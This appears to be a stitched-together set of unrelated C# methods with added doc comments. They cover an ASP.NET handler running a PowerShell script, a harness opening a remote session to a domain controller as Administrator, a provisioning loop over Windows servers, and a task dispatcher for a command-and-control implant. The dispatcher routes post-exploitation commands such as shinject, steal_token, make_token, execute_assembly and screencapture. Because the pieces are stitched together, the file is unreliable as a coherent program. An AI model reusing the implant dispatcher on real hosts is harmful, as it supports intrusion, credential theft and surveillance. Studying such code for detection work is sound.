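/// <summary>
/// Click handler that runs <c>scripts\test.ps1</c> from the application directory
/// and writes each returned name/value pair into the HTTP response.
/// </summary>
/// <param name="sender">Control that raised the event (not used).</param>
/// <param name="e">Event data (not used).</param>
protected void btnDLL_Click(object sender, EventArgs e)
{
    Powershell oPowershell = new Powershell();
    Log oLog = new Log(0, dsn);

    List<PowershellParameter> powershell = new List<PowershellParameter>();
    powershell.Add(new PowershellParameter("path", "C:"));

    List<PowershellParameter> results = oPowershell.Execute(
        Request.PhysicalApplicationPath + "scripts\\test.ps1",
        powershell,
        oLog,
        "DEV");

    foreach (PowershellParameter result in results)
    {
        // Script output is data, not markup. Encode it before it reaches the page so
        // that a name or value containing '<', '>' or '&' is rendered as text instead
        // of being interpreted by the browser (HTML/script injection).
        string safeName = System.Web.HttpUtility.HtmlEncode(Convert.ToString(result.Name));
        string safeValue = System.Web.HttpUtility.HtmlEncode(Convert.ToString(result.Value));

        // The trailing <br/> is the only markup the handler itself contributes.
        Response.Write(safeName + " = " + safeValue + "<br/>");
    }
}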
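/// <summary>
/// Manual test harness: opens a remote PowerShell session to a domain controller,
/// wraps it in an <c>AD</c> helper and runs <c>Get-ADDomain</c>.
/// </summary>
/// <param name="args">Command-line arguments (not used).</param>
/// <exception cref="InvalidOperationException">
/// Thrown when the password environment variable is not set.
/// </exception>
public static void Main(string[] args)
{
    Dictionary<string, string> par = new Dictionary<string, string>();
    par.Add("UserPrincipalName", "*****@*****.**");

    //ad.GetDomain();

    // The administrator password used to be a string literal on the
    // CreateRemoteSession call. A secret in source ends up in version control,
    // build output and every copy of the file, so it is read from the process
    // environment instead. The variable name is one chosen for this harness;
    // substitute whatever secret store the project uses. The password that was
    // previously committed should be treated as exposed and rotated.
    string password = Environment.GetEnvironmentVariable("AD_REMOTE_PASSWORD");
    if (string.IsNullOrEmpty(password))
    {
        throw new InvalidOperationException("AD_REMOTE_PASSWORD is not set.");
    }

    var ps = new Powershell();
    ps.CreateRemoteSession("TESTAD0\\Administrator", password, "10.80.1.85");
    var ad = new AD(ps);

    // ad.CreateOrgranization("N***a" , new Dictionary<string, string>());
    var ret = ps.Execute("Get-ADDomain");

    /* ps.CloseRemoteSession();
     * var ret1 = ps.Execute("Get-ADDomain");*/

    // Keep the console window open until a key is pressed.
    Console.ReadLine();
}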
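/// <summary>
/// Handle a new task: route it to the handler registered for its command name,
/// then report the outcome through <c>SendResult</c>.
/// </summary>
/// <remarks>
/// Only <c>sleep</c> is handled inline; every other command is delegated to a
/// handler class defined outside this block, so what each one does on the host
/// cannot be confirmed from here. A command name that matches no case leaves
/// <c>status</c> and <c>message</c> untouched, and <c>SendResult</c> is still called.
/// For defenders, the command vocabulary below (for example <c>shinject</c>,
/// <c>steal_token</c>, <c>make_token</c>, <c>execute_assembly</c>, <c>screencapture</c>)
/// is a compact list of the behaviours this implant can be tasked with, which is
/// useful when checking detection coverage.
/// </remarks>
/// <param name="implant">The CaramelImplant we're handling a task for</param>
public void DispatchTask(SCImplant implant)
{
    switch (this.command)
    {
        case "cd":
            Debug.WriteLine("[-] DispatchTask - Tasked to change directory " + this.@params);
            ChangeDir.Execute(this);
            break;

        case "download":
            Debug.WriteLine("[-] DispatchTask - Tasked to send file " + this.@params);
            Download.Execute(this, implant);
            break;

        case "execute_assembly":
            Debug.WriteLine("[-] DispatchTask - Tasked to execute assembly " + this.@params);
            Tasks.ExecAssembly.Execute(this, implant);
            break;

        case "exit":
            Debug.WriteLine("[-] DispatchTask - Tasked to exit");
            Exit.Execute(this, implant);
            break;

        case "jobs":
            Debug.WriteLine("[-] DispatchTask - Tasked to list jobs");
            Jobs.Execute(this, implant);
            break;

        case "jobkill":
            // Same handler as "jobs"; presumably Jobs.Execute branches on the command itself - confirm.
            Debug.WriteLine($"[-] DispatchTask - Tasked to kill job {this.@params}");
            Jobs.Execute(this, implant);
            break;

        case "kill":
            Debug.WriteLine("[-] DispatchTask - Tasked to kill PID " + this.@params);
            Kill.Execute(this);
            break;

        case "ls":
            string path = this.@params;
            Debug.WriteLine("[-] DispatchTask - Tasked to list directory " + path);
            DirectoryList.Execute(this, implant);
            break;

        case "make_token":
            // NOTE(review): this expression was garbled in the published listing and is
            // restored to match the this.@params usage in the rest of the method.
            // Only the first space-separated field of the parameters is written to the debug log.
            Debug.WriteLine("[-] DispatchTask - Tasked to make a token for " + this.@params.Split(' ')[0]);
            Token.Execute(this);
            break;

        case "ps":
            Debug.WriteLine("[-] DispatchTask - Tasked to list processes");
            ProcessList.Execute(this);
            break;

        case "powershell":
            Debug.WriteLine("[-] DispatchTask - Tasked to run powershell");
            Powershell.Execute(this);
            break;

        case "rev2self":
            Debug.WriteLine("[-] DispatchTask - Tasked to revert token");
            Token.Revert(this);
            break;

        case "run":
            Debug.WriteLine("[-] DispatchTask - Tasked to start process");
            Proc.Execute(this, implant);
            break;

        case "screencapture":
            Debug.WriteLine("[-] DispatchTask - Tasked to take screenshot.");
            ScreenCapture.Execute(this, implant);
            break;

        case "shell":
            // Shares the Proc handler with "run".
            Debug.WriteLine("[-] DispatchTask - Tasked to run shell command.");
            Proc.Execute(this, implant);
            break;

        case "shinject":
            Debug.WriteLine("[-] DispatchTask - Tasked to run shellcode.");
            Shellcode.Execute(this);
            break;

        case "sleep":
            try
            {
                // The parameter is multiplied by 1000 before it is stored on the implant.
                int sleep = Convert.ToInt32(this.@params);
                Debug.WriteLine("[-] DispatchTask - Tasked to change sleep to: " + sleep);
                implant.sleep = sleep * 1000;
                this.status = "complete";
            }
            catch
            {
                // Any conversion failure is reported back as an error result.
                Debug.WriteLine("[-] DispatchTask - ERROR sleep value provided was not int");
                this.status = "error";
                this.message = "Please provide an integer value";
            }
            break;

        case "spawn":
            Debug.WriteLine("[-] DispatchTask - Tasked to spawn");
            Spawn.Execute(this);
            break;

        case "steal_token":
            // Same handler as "make_token".
            Debug.WriteLine("[-] DispatchTask - Tasked to steal token");
            Token.Execute(this);
            break;

        case "upload":
            Debug.WriteLine("[-] DispatchTask - Tasked to get file from server");
            Upload.Execute(this, implant);
            break;
    }

    // Runs for every task, including one whose command matched nothing above.
    this.SendResult(implant);
}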
/// <summary>
/// Processes every server row returned by <c>GetStorageConfigured()</c>: servers whose
/// OS id passes <c>IsWindows</c> or <c>IsWindows2008</c> get <c>Serverprocessing.ps1</c>
/// run against them, all others are stamped as configured immediately.
/// </summary>
/// <remarks>
/// <c>Starter.NonSharedStorage</c> is set to <c>true</c> for the duration of the run and
/// reset in <c>finally</c>. Any exception that escapes the per-server handling is written
/// to the event log with its source and stack trace.
/// The original source also carries two disabled (commented-out) pieces: a 10-minute
/// watchdog <c>Timeout</c> thread started before the work, and a DNS ping pre-check
/// ahead of the script call.
/// </remarks>
public void NonShared()
{
    try
    {
        this.Starter.NonSharedStorage = true;

        // Data-access helpers, all bound to the same DSN.
        Servers servers = new Servers(0, dsn);
        OperatingSystems osLookup = new OperatingSystems(0, dsn);
        Log log = new Log(0, dsn);

        DataSet pending = servers.GetStorageConfigured();
        DataRowCollection rows = pending.Tables[0].Rows;

        foreach (DataRow row in rows)
        {
            int serverId = Int32.Parse(row["id"].ToString());
            int osId = Int32.Parse(row["osid"].ToString());
            int answerId = Int32.Parse(row["answerid"].ToString());
            int serverNumber = Int32.Parse(row["number"].ToString());
            string serverName = row["servername"].ToString();
            string ipAddress = row["ipaddress"].ToString();

            bool isWindows = osLookup.IsWindows(osId) || osLookup.IsWindows2008(osId);
            if (!isWindows)
            {
                // Nothing to run for this OS: record it as configured now.
                servers.UpdateStorageConfigured(serverId, DateTime.Now.ToString());
                continue;
            }

            string answerText = answerId.ToString();
            string numberText = serverNumber.ToString();

            // Example of the equivalent command line:
            // Serverprocessing.ps1 -AnswerID 26622 -ServerNumber 1 –Environment "Albert_Dev" –IPAddressToConnect "10.24.240.205" – ConfigureNonSharedStorage -Log
            // This text is only written to the log. The script itself receives its
            // values as separate named parameters (built below), not as this string.
            string command = "Serverprocessing.ps1 -AnswerID " + answerText
                + " -ServerNumber " + numberText
                + " –Environment \"" + this.Starter.ScriptEnvironment
                + "\" –IPAddressToConnect \"" + ipAddress
                + "\" – ConfigureNonSharedStorage -Log";
            log.AddEvent(answerId, serverName, "Non-shared storage", "Starting automated script (" + command + ")...", LoggingType.Debug);

            string error = "";
            try
            {
                List<PowershellParameter> scriptArgs = new List<PowershellParameter>();
                Powershell runner = new Powershell();
                scriptArgs.Add(new PowershellParameter("AnswerID", answerText));
                scriptArgs.Add(new PowershellParameter("ServerNumber", numberText));
                scriptArgs.Add(new PowershellParameter("Environment", this.Starter.ScriptEnvironment));
                scriptArgs.Add(new PowershellParameter("IPAddressToConnect", ipAddress));
                // The last two are added with a null value.
                scriptArgs.Add(new PowershellParameter("ConfigureNonSharedStorage", null));
                scriptArgs.Add(new PowershellParameter("Log", null));

                List<PowershellParameter> output = runner.Execute(this.Starter.strScripts + "\\Serverprocessing.ps1", scriptArgs, log, serverName);
                log.AddEvent(answerId, serverName, "Non-shared storage", "Powershell script completed!", LoggingType.Debug);

                // A "Message" entry is taken as the error text only if a non-zero
                // "ResultCode" entry was seen earlier in the same result list.
                bool scriptFailed = false;
                foreach (PowershellParameter item in output)
                {
                    log.AddEvent(answerId, serverName, "Non-shared storage", "PSOBJECT: " + item.Name + " = " + item.Value, LoggingType.Information);

                    if (item.Name == "ResultCode")
                    {
                        if (item.Value.ToString() != "0")
                        {
                            scriptFailed = true;
                        }
                    }
                    else if (item.Name == "Message" && scriptFailed)
                    {
                        error = item.Value.ToString();
                    }
                }
            }
            catch (Exception exPowershell)
            {
                // A failure while running the script is handled like a script-reported error.
                error = exPowershell.Message;
            }

            if (!String.IsNullOrEmpty(error))
            {
                log.AddEvent(answerId, serverName, "", error, LoggingType.Error);
                servers.AddError(0, 0, 0, serverId, 99991, error);
            }
            else
            {
                servers.UpdateStorageConfigured(serverId, DateTime.Now.ToString());
            }
        }
    }
    catch (Exception ex)
    {
        string error = ex.Message + " ~ (Source: " + ex.Source + ") (Stack Trace: " + ex.StackTrace + ")";
        oEventLog.WriteEntry(error, EventLogEntryType.Error);
    }
    finally
    {
        // Always clear the in-progress flag, whether or not the run succeeded.
        this.Starter.NonSharedStorage = false;
    }
}